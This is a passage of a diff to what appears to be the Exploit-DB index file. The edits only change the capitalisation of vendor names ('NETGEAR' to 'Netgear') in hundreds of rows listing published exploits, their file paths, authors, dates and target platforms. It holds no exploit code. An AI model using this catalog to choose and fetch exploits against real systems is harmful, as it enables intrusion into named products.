Bypass",2014-03-10,"Guillaume Ross",remote,ios, 39115,exploits/multiple/remote/39115.py,"ET - Chat Password Reset Security Bypass",2014-03-09,IRH,remote,multiple, @@ -17361,7 +17362,7 @@ id,file,description,date,author,type,platform,port 39439,exploits/jsp/remote/39439.txt,"File Replication Pro 7.2.0 - Multiple Vulnerabilities",2016-02-11,"Vantage Point Security",remote,jsp, 39499,exploits/linux/remote/39499.txt,"Proxmox VE 3/4 - Insecure Hostname Checking Remote Command Execution",2016-02-26,Sysdream,remote,linux, 39514,exploits/php/remote/39514.rb,"ATutor 2.2.1 - SQL Injection / Remote Code Execution (Metasploit)",2016-03-01,Metasploit,remote,php,80 -39515,exploits/windows/remote/39515.rb,"NETGEAR NMS300 ProSafe Network Management System - Arbitrary File Upload (Metasploit)",2016-03-01,Metasploit,remote,windows,8080 +39515,exploits/windows/remote/39515.rb,"Netgear NMS300 ProSafe Network Management System - Arbitrary File Upload (Metasploit)",2016-03-01,Metasploit,remote,windows,8080 39522,exploits/hardware/remote/39522.txt,"Schneider Electric SBO / AS - Multiple Vulnerabilities",2016-03-03,"Karn Ganeshen",remote,hardware, 39554,exploits/php/remote/39554.rb,"PHP Utility Belt - Remote Code Execution (Metasploit)",2016-03-11,Metasploit,remote,php,80 39568,exploits/hardware/remote/39568.py,"Cisco UCS Manager 2.1(1b) - Remote Command Injection (Shellshock)",2016-03-16,thatchriseckert,remote,hardware,443 @@ -17490,8 +17491,8 @@ id,file,description,date,author,type,platform,port 40758,exploits/windows/remote/40758.rb,"Disk Pulse Enterprise 9.0.34 - 'Login' Remote Buffer Overflow (Metasploit)",2016-11-14,Metasploit,remote,windows, 40734,exploits/hardware/remote/40734.sh,"MOVISTAR BHS_RTA ADSL Router - Remote File Disclosure",2016-11-08,"Todor Donev",remote,hardware, 40735,exploits/hardware/remote/40735.txt,"D-Link DSL-2730U/2750U/2750E ADSL Router - Remote File Disclosure",2016-11-08,"Todor Donev",remote,hardware, -40736,exploits/hardware/remote/40736.txt,"NETGEAR JNR1010 ADSL Router - (Authenticated) Remote File Disclosure",2016-11-08,"Todor Donev",remote,hardware, -40737,exploits/hardware/remote/40737.sh,"NETGEAR WNR500/WNR612v3/JNR1010/JNR2010 ADSL Router - (Authenticated) Remote File Disclosure",2016-11-08,"Todor Donev",remote,hardware, +40736,exploits/hardware/remote/40736.txt,"Netgear JNR1010 ADSL Router - (Authenticated) Remote File Disclosure",2016-11-08,"Todor Donev",remote,hardware, +40737,exploits/hardware/remote/40737.sh,"Netgear WNR500/WNR612v3/JNR1010/JNR2010 ADSL Router - (Authenticated) Remote File Disclosure",2016-11-08,"Todor Donev",remote,hardware, 40738,exploits/hardware/remote/40738.sh,"PLANET ADSL Router AND-4101 - Remote File Disclosure",2016-11-08,"Todor Donev",remote,hardware, 40740,exploits/linux_mips/remote/40740.rb,"Eir D1000 Wireless Router - WAN Side Remote Command Injection (Metasploit)",2016-11-08,Kenzo,remote,linux_mips,7547 40767,exploits/windows/remote/40767.rb,"WinaXe 7.7 FTP Client - Remote Buffer Overflow (Metasploit)",2016-11-15,Metasploit,remote,windows, @@ -17517,7 +17518,7 @@ id,file,description,date,author,type,platform,port 40916,exploits/linux/remote/40916.txt,"APT - Repository Signing Bypass via Memory Allocation Failure",2016-12-14,"Google Security Research",remote,linux, 40920,exploits/linux/remote/40920.py,"Nagios < 4.2.2 - Arbitrary Code Execution",2016-12-15,"Dawid Golunski",remote,linux, 40930,exploits/osx/remote/40930.txt,"Horos 2.1.0 Web Portal - Directory Traversal",2016-12-16,LiquidWorm,remote,osx, -40949,exploits/cgi/remote/40949.rb,"NETGEAR WNR2000v5 - Remote Code Execution",2016-12-21,"Pedro Ribeiro",remote,cgi,80 +40949,exploits/cgi/remote/40949.rb,"Netgear WNR2000v5 - Remote Code Execution",2016-12-21,"Pedro Ribeiro",remote,cgi,80 40963,exploits/linux/remote/40963.txt,"OpenSSH < 7.4 - agent Protocol Arbitrary Library Loading",2016-12-23,"Google Security Research",remote,linux,22 40984,exploits/windows/remote/40984.py,"Internet Download Accelerator 6.10.1.1527 - FTP Buffer Overflow (SEH)",2017-01-02,"Fady Mohammed Osman",remote,windows, 40990,exploits/windows/remote/40990.txt,"Microsoft Edge (Windows 10) - 'chakra.dll' Information Leak / Type Confusion Remote Code Execution",2017-01-05,"Brian Pak",remote,windows, @@ -17545,7 +17546,7 @@ id,file,description,date,author,type,platform,port 41511,exploits/windows/remote/41511.py,"FTPShell Client 6.53 - Remote Buffer Overflow",2017-03-04,"Peter Baris",remote,windows, 41545,exploits/windows/remote/41545.py,"Azure Data Expert Ultimate 2.2.16 - Remote Buffer Overflow",2017-03-07,"Peter Baris",remote,windows, 41592,exploits/windows/remote/41592.txt,"MobaXterm Personal Edition 9.4 - Directory Traversal",2017-03-11,hyp3rlinx,remote,windows, -41598,exploits/cgi/remote/41598.rb,"NETGEAR R7000 / R6400 - 'cgi-bin' Command Injection (Metasploit)",2017-03-13,Metasploit,remote,cgi,80 +41598,exploits/cgi/remote/41598.rb,"Netgear R7000 / R6400 - 'cgi-bin' Command Injection (Metasploit)",2017-03-13,Metasploit,remote,cgi,80 41613,exploits/windows/remote/41613.rb,"IBM WebSphere - RCE Java Deserialization (Metasploit)",2017-03-15,Metasploit,remote,windows,8800 41614,exploits/multiple/remote/41614.rb,"Apache Struts 2.3.5 < 2.3.31 / 2.5 < 2.5.10 - 'Jakarta' Multipart Parser OGNL Injection (Metasploit)",2017-03-15,Metasploit,remote,multiple,8080 43353,exploits/android/remote/43353.py,"Outlook for Android - Attachment Download Directory Traversal",2017-12-18,"Google Security Research",remote,android, @@ -17636,7 +17637,7 @@ id,file,description,date,author,type,platform,port 41987,exploits/windows_x86-64/remote/41987.py,"Microsoft Windows Server 2008 R2 (x64) - 'SrvOs2FeaToNt' SMB Remote Code Execution (MS17-010)",2017-05-10,"Juan Sacco",remote,windows_x86-64, 42287,exploits/android/remote/42287.txt,"eVestigator Forensic PenTester - Man In The Middle Remote Code Execution",2017-06-30,intern0t,remote,android, 41718,exploits/hardware/remote/41718.txt,"Miele Professional PG 8528 - Directory Traversal",2017-03-24,"Jens Regel",remote,hardware, -41719,exploits/hardware/remote/41719.rb,"NETGEAR WNR2000v5 - 'hidden_lang_avi' Remote Stack Overflow (Metasploit)",2017-03-24,"Pedro Ribeiro",remote,hardware,80 +41719,exploits/hardware/remote/41719.rb,"Netgear WNR2000v5 - 'hidden_lang_avi' Remote Stack Overflow (Metasploit)",2017-03-24,"Pedro Ribeiro",remote,hardware,80 41720,exploits/python/remote/41720.rb,"Logsign 4.4.2/4.4.137 - Remote Command Injection (Metasploit)",2017-03-24,"Mehmet Ince",remote,python, 41738,exploits/windows/remote/41738.py,"Microsoft IIS 6.0 - WebDAV 'ScStoragePathFromUrl' Remote Buffer Overflow",2017-03-27,"Zhiniang Peng & Chen Wu",remote,windows, 41740,exploits/multiple/remote/41740.txt,"Samba 4.5.2 - Symlink Race Permits Opening Files Outside Share Directory",2017-03-27,"Google Security Research",remote,multiple, @@ -17694,7 +17695,7 @@ id,file,description,date,author,type,platform,port 42186,exploits/windows/remote/42186.py,"Easy File Sharing Web Server 7.2 - 'POST' Remote Buffer Overflow (DEP Bypass)",2017-06-15,"bl4ck h4ck3r",remote,windows, 42222,exploits/windows/remote/42222.py,"SpyCamLizard 1.230 - Remote Buffer Overflow",2017-06-20,abatchy17,remote,windows, 42251,exploits/python/remote/42251.rb,"Symantec Messaging Gateway 10.6.2-7 - Remote Code Execution (Metasploit)",2017-06-26,"Mehmet Ince",remote,python,443 -42257,exploits/cgi/remote/42257.rb,"NETGEAR DGN2200 - 'dnslookup.cgi' Command Injection (Metasploit)",2017-06-26,Metasploit,remote,cgi,80 +42257,exploits/cgi/remote/42257.rb,"Netgear DGN2200 - 'dnslookup.cgi' Command Injection (Metasploit)",2017-06-26,Metasploit,remote,cgi,80 42282,exploits/windows/remote/42282.rb,"Veritas/Symantec Backup Exec - SSL NDMP Connection Use-After-Free (Metasploit)",2017-06-29,Metasploit,remote,windows,10000 42283,exploits/java/remote/42283.rb,"ActiveMQ < 5.14.0 - Web Shell Upload (Metasploit)",2017-06-29,Metasploit,remote,java, 42288,exploits/android/remote/42288.txt,"BestSafe Browser - Man In The Middle Remote Code Execution",2017-06-30,intern0t,remote,android, @@ -17820,7 +17821,7 @@ id,file,description,date,author,type,platform,port 44228,exploits/php/remote/44228.php,"Posnic Stock Management System - SQL Injection",2017-02-03,"Manish Tanwar",remote,php, 44229,exploits/php/remote/44229.txt,"WordPress Plugin Polls 1.2.4 - SQL Injection (PoC)",2017-10-22,"Manish Tanwar",remote,php, 44242,exploits/android/remote/44242.md,"Papenmeier WiFi Baby Monitor Free & Lite < 2.02.2 - Remote Audio Record",2018-02-25,iamrastating,remote,android, -44245,exploits/hardware/remote/44245.rb,"NETGEAR - 'TelnetEnable' Magic Packet (Metasploit)",2018-03-05,Metasploit,remote,hardware,23 +44245,exploits/hardware/remote/44245.rb,"Netgear - 'TelnetEnable' Magic Packet (Metasploit)",2018-03-05,Metasploit,remote,hardware,23 44253,exploits/hardware/remote/44253.py,"Tenda AC15 Router - Remote Code Execution",2018-02-14,"Tim Carrington",remote,hardware, 44280,exploits/multiple/remote/44280.rb,"Eclipse Equinoxe OSGi Console - Command Execution (Metasploit)",2018-03-12,Metasploit,remote,multiple, 44283,exploits/hardware/remote/44283.py,"MikroTik RouterOS < 6.38.4 (MIPSBE) - 'Chimay Red' Stack Clash Remote Code Execution",2018-03-12,"Lorenzo Santina",remote,hardware, @@ -20763,7 +20764,7 @@ id,file,description,date,author,type,platform,port 5062,exploits/php/webapps/5062.txt,"RMSOFT Gallery System 2.0 - 'id' SQL Injection",2008-02-05,you_kn0w,webapps,php, 5064,exploits/php/webapps/5064.txt,"All Club CMS 0.0.2 - 'index.php' SQL Injection",2008-02-05,ka0x,webapps,php, 5065,exploits/php/webapps/5065.txt,"PhotoKorn Gallery 1.543 - 'pic' SQL Injection",2008-02-05,you_kn0w,webapps,php, -5066,exploits/php/webapps/5066.php,"WordPress MU < 1.3.2 - active_plugins option Code Execution",2008-02-05,"Alexander Concha",webapps,php, +5066,exploits/php/webapps/5066.php,"WordPress MU < 1.3.2 - 'active_plugins' Code Execution",2008-02-05,"Alexander Concha",webapps,php, 5068,exploits/php/webapps/5068.txt,"OpenSiteAdmin 0.9.1.1 - Multiple File Inclusions",2008-02-06,Trancek,webapps,php, 5070,exploits/php/webapps/5070.pl,"MyBulletinBoard (MyBB) 1.2.11 - 'private.php' SQL Injection (1)",2008-02-06,F,webapps,php, 5071,exploits/php/webapps/5071.txt,"Astanda Directory Project 1.2 - 'link_id' SQL Injection",2008-02-06,you_kn0w,webapps,php, @@ -27356,7 +27357,7 @@ id,file,description,date,author,type,platform,port 17871,exploits/hardware/webapps/17871.txt,"Cisco TelePresence SOS-11-010 - Multiple Vulnerabilities",2011-09-19,"Sense of Security",webapps,hardware, 17872,exploits/php/webapps/17872.txt,"Multiple WordPress Plugins - 'timthumb.php' File Upload",2011-09-19,"Ben Schmidt",webapps,php, 17873,exploits/windows/webapps/17873.txt,"SharePoint 2007/2010 and DotNetNuke < 6 - File Disclosure (via XEE)",2011-09-20,"Nicolas Gregoire",webapps,windows, -17874,exploits/hardware/webapps/17874.txt,"NETGEAR Wireless Cable Modem Gateway - Authentication Bypass / Cross-Site Request Forgery",2011-09-20,"Sense of Security",webapps,hardware, +17874,exploits/hardware/webapps/17874.txt,"Netgear Wireless Cable Modem Gateway - Authentication Bypass / Cross-Site Request Forgery",2011-09-20,"Sense of Security",webapps,hardware, 17882,exploits/php/webapps/17882.php,"JAKCMS PRO 2.2.5 - Arbitrary File Upload",2011-09-22,EgiX,webapps,php, 17887,exploits/php/webapps/17887.txt,"WordPress Plugin Link Library 5.2.1 - SQL Injection",2011-09-24,"Miroslav Stampar",webapps,php, 17888,exploits/php/webapps/17888.txt,"WordPress Plugin AdRotate 3.6.5 - SQL Injection",2011-09-24,"Miroslav Stampar",webapps,php, @@ -29334,7 +29335,7 @@ id,file,description,date,author,type,platform,port 24424,exploits/php/webapps/24424.txt,"Newtelligence DasBlog 1.x - Request Log HTML Injection",2004-09-01,"Dominick Baier",webapps,php, 24425,exploits/php/webapps/24425.txt,"phpWebSite 0.7.3/0.8.x/0.9.x Comment Module - 'CM_pid' Cross-Site Scripting",2004-09-01,"GulfTech Security",webapps,php, 24432,exploits/windows/webapps/24432.txt,"Microsoft Internet Explorer 8/9 - Steal Any Cookie",2013-01-28,"Christian Haider",webapps,windows, -24441,exploits/hardware/webapps/24441.txt,"NETGEAR SPH200D - Multiple Vulnerabilities",2013-01-31,m-1-k-3,webapps,hardware, +24441,exploits/hardware/webapps/24441.txt,"Netgear SPH200D - Multiple Vulnerabilities",2013-01-31,m-1-k-3,webapps,hardware, 24508,exploits/php/webapps/24508.txt,"Scripts Genie Gallery Personals - 'gallery.php?L' SQL Injection",2013-02-17,3spi0n,webapps,php, 24433,exploits/php/webapps/24433.txt,"PHP weby directory software 1.2 - Multiple Vulnerabilities",2013-01-28,AkaStep,webapps,php, 24435,exploits/hardware/webapps/24435.txt,"Fortinet FortiMail 400 IBE - Multiple Vulnerabilities",2013-01-29,Vulnerability-Lab,webapps,hardware, @@ -29352,7 +29353,7 @@ id,file,description,date,author,type,platform,port 24456,exploits/php/webapps/24456.txt,"glossword 1.8.12 - Multiple Vulnerabilities",2013-02-05,AkaStep,webapps,php, 24457,exploits/php/webapps/24457.txt,"Glossword 1.8.3 - SQL Injection",2013-02-05,AkaStep,webapps,php, 24462,exploits/php/webapps/24462.txt,"Hiverr 2.2 - Multiple Vulnerabilities",2013-02-06,xStarCode,webapps,php, -24464,exploits/hardware/webapps/24464.txt,"NETGEAR DGN1000B - Multiple Vulnerabilities",2013-02-07,m-1-k-3,webapps,hardware, +24464,exploits/hardware/webapps/24464.txt,"Netgear DGN1000B - Multiple Vulnerabilities",2013-02-07,m-1-k-3,webapps,hardware, 24465,exploits/php/webapps/24465.txt,"CubeCart 5.2.0 - 'cubecart.class.php' PHP Object Injection",2013-02-07,EgiX,webapps,php, 24466,exploits/hardware/webapps/24466.txt,"WirelessFiles 1.1 iPad iPhone - Multiple Vulnerabilities",2013-02-07,Vulnerability-Lab,webapps,hardware, 24510,exploits/php/webapps/24510.txt,"Scripts Genie Domain Trader - 'catalog.php?id' SQL Injection",2013-02-17,3spi0n,webapps,php, @@ -29379,7 +29380,7 @@ id,file,description,date,author,type,platform,port 24506,exploits/php/webapps/24506.txt,"Cometchat - Multiple Vulnerabilities",2013-02-15,B127Y,webapps,php, 24507,exploits/php/webapps/24507.txt,"ChillyCMS 1.3.0 - Multiple Vulnerabilities",2013-02-15,"Abhi M Balakrishnan",webapps,php, 24512,exploits/php/webapps/24512.txt,"Scripts Genie Top Sites - 'out.php?id' SQL Injection",2013-02-17,3spi0n,webapps,php, -24513,exploits/hardware/webapps/24513.txt,"NETGEAR DGN2200B - Multiple Vulnerabilities",2013-02-18,m-1-k-3,webapps,hardware, +24513,exploits/hardware/webapps/24513.txt,"Netgear DGN2200B - Multiple Vulnerabilities",2013-02-18,m-1-k-3,webapps,hardware, 24514,exploits/php/webapps/24514.txt,"Scripts Genie Pet Rate Pro - Multiple Vulnerabilities",2013-02-18,TheMirkin,webapps,php, 24515,exploits/php/webapps/24515.txt,"Cometchat Application - Multiple Vulnerabilities",2013-02-18,z3r0sPlOiT,webapps,php, 24516,exploits/php/webapps/24516.txt,"Scripts Genie Hot Scripts Clone - 'showcategory.php?cid' SQL Injection",2013-02-18,"Easy Laster",webapps,php, @@ -29580,7 +29581,7 @@ id,file,description,date,author,type,platform,port 24913,exploits/php/webapps/24913.txt,"Network Weathermap 0.97a - 'editor.php' Persistent Cross-Site Scripting",2013-04-02,"Daniel Ricardo dos Santos",webapps,php, 24914,exploits/php/webapps/24914.txt,"WordPress Plugin FuneralPress 1.1.6 - Persistent Cross-Site Scripting",2013-04-02,"Rob Armstrong",webapps,php, 24915,exploits/multiple/webapps/24915.txt,"Aspen 0.8 - Directory Traversal",2013-04-02,"Daniel Ricardo dos Santos",webapps,multiple, -24916,exploits/hardware/webapps/24916.txt,"NETGEAR WNR1000 - Authentication Bypass",2013-04-02,"Roberto Paleari",webapps,hardware, +24916,exploits/hardware/webapps/24916.txt,"Netgear WNR1000 - Authentication Bypass",2013-04-02,"Roberto Paleari",webapps,hardware, 24924,exploits/hardware/webapps/24924.txt,"Belkin Wemo - Arbitrary Firmware Upload",2013-04-08,"Daniel Buentello",webapps,hardware, 24926,exploits/hardware/webapps/24926.txt,"D-Link - Multiple Vulnerabilities",2013-04-08,m-1-k-3,webapps,hardware, 24927,exploits/php/webapps/24927.txt,"Vanilla Forums 2-0-18-4 - SQL Injection",2013-04-08,bl4ckw0rm,webapps,php, @@ -30292,12 +30293,12 @@ id,file,description,date,author,type,platform,port 25964,exploits/php/webapps/25964.c,"PHPsFTPd 0.2/0.4 - 'Inc.login.php' Privilege Escalation",2005-07-11,"Stefan Lochbihler",webapps,php, 25965,exploits/asp/webapps/25965.txt,"DVBBS 7.1 - 'ShowErr.asp' Cross-Site Scripting",2005-07-12,rUnViRuS,webapps,asp, 25968,exploits/hardware/webapps/25968.pl,"Seowonintech Routers fw: 2.3.9 - File Disclosure",2013-06-05,"Todor Donev",webapps,hardware, -25969,exploits/hardware/webapps/25969.txt,"NETGEAR WPN824v3 - Unauthorized Configuration Download",2013-06-05,"Jens Regel",webapps,hardware, +25969,exploits/hardware/webapps/25969.txt,"Netgear WPN824v3 - Unauthorized Configuration Download",2013-06-05,"Jens Regel",webapps,hardware, 25971,exploits/php/webapps/25971.txt,"Cuppa CMS - '/alertConfigField.php' Local/Remote File Inclusion",2013-06-05,"CWH Underground",webapps,php, 25973,exploits/php/webapps/25973.txt,"Ruubikcms 1.1.1 - 'tinybrowser.php?folder' Directory Traversal",2013-06-05,expl0i13r,webapps,php, 25976,exploits/hardware/webapps/25976.txt,"DS3 Authentication Server - Multiple Vulnerabilities",2013-06-05,"Pedro Andujar",webapps,hardware, 25977,exploits/jsp/webapps/25977.txt,"Imperva SecureSphere Operations Manager 9.0.0.5 - Multiple Vulnerabilities",2013-06-05,"Pedro Andujar",webapps,jsp, -25978,exploits/hardware/webapps/25978.txt,"NETGEAR DGN1000 / DGN2200 - Multiple Vulnerabilities",2013-06-05,"Roberto Paleari",webapps,hardware,80 +25978,exploits/hardware/webapps/25978.txt,"Netgear DGN1000 / DGN2200 - Multiple Vulnerabilities",2013-06-05,"Roberto Paleari",webapps,hardware,80 25981,exploits/asp/webapps/25981.txt,"Hosting Controller 6.1 - Multiple SQL Injections",2005-07-13,"Soroush Dalili",webapps,asp, 25982,exploits/cfm/webapps/25982.txt,"Simple Message Board 2.0 beta1 - 'Forum.cfm' Cross-Site Scripting",2005-07-14,rUnViRuS,webapps,cfm, 25983,exploits/cfm/webapps/25983.txt,"Simple Message Board 2.0 beta1 - 'User.cfm' Cross-Site Scripting",2005-07-14,rUnViRuS,webapps,cfm, @@ -31679,7 +31680,7 @@ id,file,description,date,author,type,platform,port 27855,exploits/php/webapps/27855.txt,"Vizra - 'A_Login.php' Cross-Site Scripting",2006-05-11,R00TT3R,webapps,php, 27857,exploits/php/webapps/27857.txt,"phpBB Chart Mod 1.1 - 'charts.php?id' SQL Injection",2006-05-11,sn4k3.23,webapps,php, 27773,exploits/php/webapps/27773.txt,"CBHotel Hotel Software and Booking system 1.8 - Multiple Vulnerabilities",2013-08-22,"Dylan Irzi",webapps,php, -27774,exploits/hardware/webapps/27774.py,"NETGEAR ProSafe - Information Disclosure",2013-08-22,"Juan J. Guelfo",webapps,hardware, +27774,exploits/hardware/webapps/27774.py,"Netgear ProSafe - Information Disclosure",2013-08-22,"Juan J. Guelfo",webapps,hardware, 27776,exploits/linux/webapps/27776.rb,"Foreman (RedHat OpenStack/Satellite) - users/create Mass Assignment (Metasploit)",2013-08-22,Metasploit,webapps,linux,443 27777,exploits/windows/webapps/27777.txt,"DeWeS 0.4.2 - Directory Traversal",2013-08-22,"High-Tech Bridge SA",webapps,windows, 27779,exploits/php/webapps/27779.txt,"Advanced Guestbook 2.x - 'Addentry.php' Remote File Inclusion",2006-04-29,[Oo],webapps,php, @@ -33577,7 +33578,7 @@ id,file,description,date,author,type,platform,port 32394,exploits/asp/webapps/32394.txt,"Sama Educational Management System - 'error.asp' Cross-Site Scripting",2008-09-18,Lagon666,webapps,asp, 32392,exploits/php/webapps/32392.pl,"Add a link 4 - Security Bypass / SQL Injection",2008-09-17,JosS,webapps,php, 32388,exploits/php/webapps/32388.txt,"Cars & Vehicle - 'page.php' SQL Injection",2008-09-17,"Hussin X",webapps,php, -33984,exploits/hardware/webapps/33984.rb,"NETGEAR WNR1000v3 - Password Recovery Credential Disclosure (Metasploit)",2014-07-07,c1ph04,webapps,hardware, +33984,exploits/hardware/webapps/33984.rb,"Netgear WNR1000v3 - Password Recovery Credential Disclosure (Metasploit)",2014-07-07,c1ph04,webapps,hardware, 30581,exploits/php/webapps/30581.txt,"CS-Guestbook 0.1 - Login Credentials Information Disclosure",2007-09-12,Cr@zy_King,webapps,php, 30583,exploits/php/webapps/30583.txt,"PHP-Stats 0.1.9.2 - 'Tracking.php' Cross-Site Scripting",2007-09-14,root@hanicker.it,webapps,php, 30585,exploits/cgi/webapps/30585.txt,"Axis Communications 207W Network Camera - Web Interface axis-cgi/admin/restart.cgi Cross-Site Request Forgery",2007-09-14,"Seth Fogie",webapps,cgi, @@ -34241,7 +34242,7 @@ id,file,description,date,author,type,platform,port 31611,exploits/php/webapps/31611.txt,"RobotStats 0.1 - 'robotstats.inc.php?DOCUMENT_ROOT' Remote File Inclusion",2008-04-04,ZoRLu,webapps,php, 31614,exploits/php/webapps/31614.txt,"Tiny Portal 1.0 - 'shouts' Cross-Site Scripting",2008-04-04,Y433r,webapps,php, 31616,exploits/php/webapps/31616.txt,"Web Server Creator 0.1 - 'langfile' Remote File Inclusion",2008-04-04,ZoRLu,webapps,php, -31617,exploits/hardware/webapps/31617.txt,"NETGEAR DGN2200 N300 Wireless Router - Multiple Vulnerabilities",2014-02-12,"Andrew Horton",webapps,hardware, +31617,exploits/hardware/webapps/31617.txt,"Netgear DGN2200 N300 Wireless Router - Multiple Vulnerabilities",2014-02-12,"Andrew Horton",webapps,hardware, 31618,exploits/ios/webapps/31618.txt,"jDisk (stickto) 2.0.3 iOS - Multiple Vulnerabilities",2014-02-12,Vulnerability-Lab,webapps,ios, 31621,exploits/java/webapps/31621.txt,"Sun Java System Messenger Express 6.1-13-15 - 'sid' Cross-Site Scripting",2008-04-07,syniack,webapps,java, 31622,exploits/php/webapps/31622.txt,"URLStreet 1.0 - 'seeurl.php' Multiple Cross-Site Scripting Vulnerabilities",2008-04-07,ZoRLu,webapps,php, @@ -35020,7 +35021,7 @@ id,file,description,date,author,type,platform,port 32875,exploits/php/webapps/32875.txt,"Comparison Engine Power 1.0 - 'product.comparision.php' SQL Injection",2009-03-25,SirGod,webapps,php, 32880,exploits/php/webapps/32880.txt,"Turnkey eBook Store 1.1 - 'keywords' Cross-Site Scripting",2009-03-31,TEAMELITE,webapps,php, 32882,exploits/asp/webapps/32882.txt,"SAP Business Objects Crystal Reports 7-10 - 'viewreport.asp' Cross-Site Scripting",2009-04-02,"Bugs NotHugs",webapps,asp, -32883,exploits/hardware/webapps/32883.txt,"NETGEAR WNDR3400 N600 Wireless Dual Band - Multiple Vulnerabilities",2014-04-15,"Santhosh Kumar",webapps,hardware,8080 +32883,exploits/hardware/webapps/32883.txt,"Netgear WNDR3400 N600 Wireless Dual Band - Multiple Vulnerabilities",2014-04-15,"Santhosh Kumar",webapps,hardware,8080 32886,exploits/hardware/webapps/32886.txt,"Xerox DocuShare - SQL Injection",2014-04-15,"Brandon Perry",webapps,hardware,8080 32888,exploits/asp/webapps/32888.txt,"Asbru Web Content Management 6.5/6.6.9 - SQL Injection / Cross-Site Scripting",2009-04-02,"Patrick Webster",webapps,asp, 32889,exploits/php/webapps/32889.txt,"4CMS - SQL Injection / Local File Inclusion",2009-04-02,k1ll3r_null,webapps,php, @@ -35140,7 +35141,7 @@ id,file,description,date,author,type,platform,port 33132,exploits/php/webapps/33132.txt,"Softbiz Dating Script 1.0 - 'cat_products.php' SQL Injection",2009-07-30,MizoZ,webapps,php, 33136,exploits/hardware/webapps/33136.txt,"Fritz!Box - Remote Command Execution",2014-05-01,0x4148,webapps,hardware, 33340,exploits/php/webapps/33340.txt,"CuteNews 1.4.6 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2009-11-10,"Andrew Horton",webapps,php, -33138,exploits/hardware/webapps/33138.txt,"NETGEAR DGN2200 1.0.0.29_1.7.29_HotS - Persistent Cross-Site Scripting",2014-05-01,"Dolev Farhi",webapps,hardware, +33138,exploits/hardware/webapps/33138.txt,"Netgear DGN2200 1.0.0.29_1.7.29_HotS - Persistent Cross-Site Scripting",2014-05-01,"Dolev Farhi",webapps,hardware, 33144,exploits/php/webapps/33144.txt,"Censura < 2.1.1 - Multiple Cross-Site Scripting Vulnerabilities",2009-06-29,mark99,webapps,php, 33146,exploits/php/webapps/33146.txt,"CS-Cart 2.0.5 - 'reward_points.post.php' SQL Injection",2009-08-04,"Ryan Dewhurst",webapps,php, 33147,exploits/php/webapps/33147.txt,"AJ Auction Pro 3.0 - 'txtkeyword' Cross-Site Scripting",2009-08-05,"599eme Man",webapps,php, @@ -35668,7 +35669,7 @@ id,file,description,date,author,type,platform,port 34127,exploits/php/webapps/34127.txt,"Arab Portal 2.2 - 'members.php' SQL Injection",2010-06-10,SwEET-DeViL,webapps,php, 34128,exploits/hardware/webapps/34128.py,"MTS MBlaze Ultra Wi-Fi / ZTE AC3633 - Multiple Vulnerabilities",2014-07-21,"Ajin Abraham",webapps,hardware,80 34161,exploits/php/webapps/34161.txt,"WordPress Plugin Video Gallery 2.5 - Multiple Vulnerabilities",2014-07-24,"Claudio Viviani",webapps,php,80 -34149,exploits/hardware/webapps/34149.txt,"NETGEAR DGN2200 1.0.0.29_1.7.29_HotS - Password Disclosure",2014-07-23,"Dolev Farhi",webapps,hardware, +34149,exploits/hardware/webapps/34149.txt,"Netgear DGN2200 1.0.0.29_1.7.29_HotS - Password Disclosure",2014-07-23,"Dolev Farhi",webapps,hardware, 34159,exploits/php/webapps/34159.txt,"Joomla! Component Gallery XML 1.1 - SQL Injection / Local File Inclusion",2010-06-18,jdc,webapps,php, 34163,exploits/hardware/webapps/34163.txt,"Lian Li NAS - Multiple Vulnerabilities",2014-07-24,pws,webapps,hardware, 34165,exploits/multiple/webapps/34165.txt,"Zenoss Monitoring System 4.2.5-2108 (x64) - Persistent Cross-Site Scripting",2014-07-25,"Dolev Farhi",webapps,multiple, @@ -36418,7 +36419,7 @@ id,file,description,date,author,type,platform,port 35381,exploits/php/webapps/35381.txt,"xEpan 1.0.1 - Cross-Site Request Forgery",2014-11-26,"High-Tech Bridge SA",webapps,php,80 35323,exploits/php/webapps/35323.md,"MyBB 1.8.2 - 'unset_globals()' Function Bypass / Remote Code Execution",2014-11-22,"Taoguang Chen",webapps,php, 35324,exploits/php/webapps/35324.txt,"WordPress Plugin CM Download Manager 2.0.0 - Code Injection",2014-11-22,"Phi Ngoc Le",webapps,php, -35325,exploits/hardware/webapps/35325.txt,"NETGEAR WNR500 Wireless Router - 'webproc?getpage' Traversal Arbitrary File Access",2014-11-22,LiquidWorm,webapps,hardware, +35325,exploits/hardware/webapps/35325.txt,"Netgear WNR500 Wireless Router - 'webproc?getpage' Traversal Arbitrary File Access",2014-11-22,LiquidWorm,webapps,hardware, 35327,exploits/php/webapps/35327.txt,"CiviCRM 3.3.3 - Multiple Cross-Site Scripting Vulnerabilities",2011-02-08,"AutoSec Tools",webapps,php, 35328,exploits/php/webapps/35328.txt,"UMI CMS 2.8.1.2 - Multiple Cross-Site Scripting Vulnerabilities",2011-02-08,"High-Tech Bridge SA",webapps,php, 35329,exploits/php/webapps/35329.txt,"PHPXref 0.7 - 'nav.html' Cross-Site Scripting",2011-02-09,MustLive,webapps,php, @@ -37973,7 +37974,7 @@ id,file,description,date,author,type,platform,port 37713,exploits/php/webapps/37713.txt,"2Moons - Multiple Vulnerabilities",2015-07-29,bRpsd,webapps,php,80 37714,exploits/php/webapps/37714.txt,"JoomShopping - Blind SQL Injection",2015-07-29,Mormoroth,webapps,php,80 37715,exploits/php/webapps/37715.txt,"Tendoo CMS 1.3 - Cross-Site Scripting",2015-07-29,"Arash Khazaei",webapps,php,80 -37720,exploits/hardware/webapps/37720.py,"NETGEAR ReadyNAS LAN /dbbroker 6.2.4 - Credential Disclosure",2015-07-31,St0rn,webapps,hardware, +37720,exploits/hardware/webapps/37720.py,"Netgear ReadyNAS LAN /dbbroker 6.2.4 - Credential Disclosure",2015-07-31,St0rn,webapps,hardware, 37725,exploits/php/webapps/37725.txt,"Froxlor Server Management Panel 0.9.33.1 - MySQL Login Information Disclosure",2015-08-07,"Dustin Dörr",webapps,php, 37726,exploits/php/webapps/37726.txt,"PHP News Script 4.0.0 - SQL Injection",2015-08-07,"Meisam Monsef",webapps,php,80 37734,exploits/php/webapps/37734.html,"Microweber 1.0.3 - Persistent Cross-Site Scripting / Cross-Site Request Forgery (Add Admin)",2015-08-07,LiquidWorm,webapps,php,80 @@ -38151,7 +38152,7 @@ id,file,description,date,author,type,platform,port 38101,exploits/php/webapps/38101.txt,"WordPress Plugin Zingiri Forums - 'language' Local File Inclusion",2012-12-30,Amirh03in,webapps,php, 38102,exploits/php/webapps/38102.txt,"WordPress Theme Nest - 'codigo' SQL Injection",2012-12-04,"Ashiyane Digital Security Team",webapps,php, 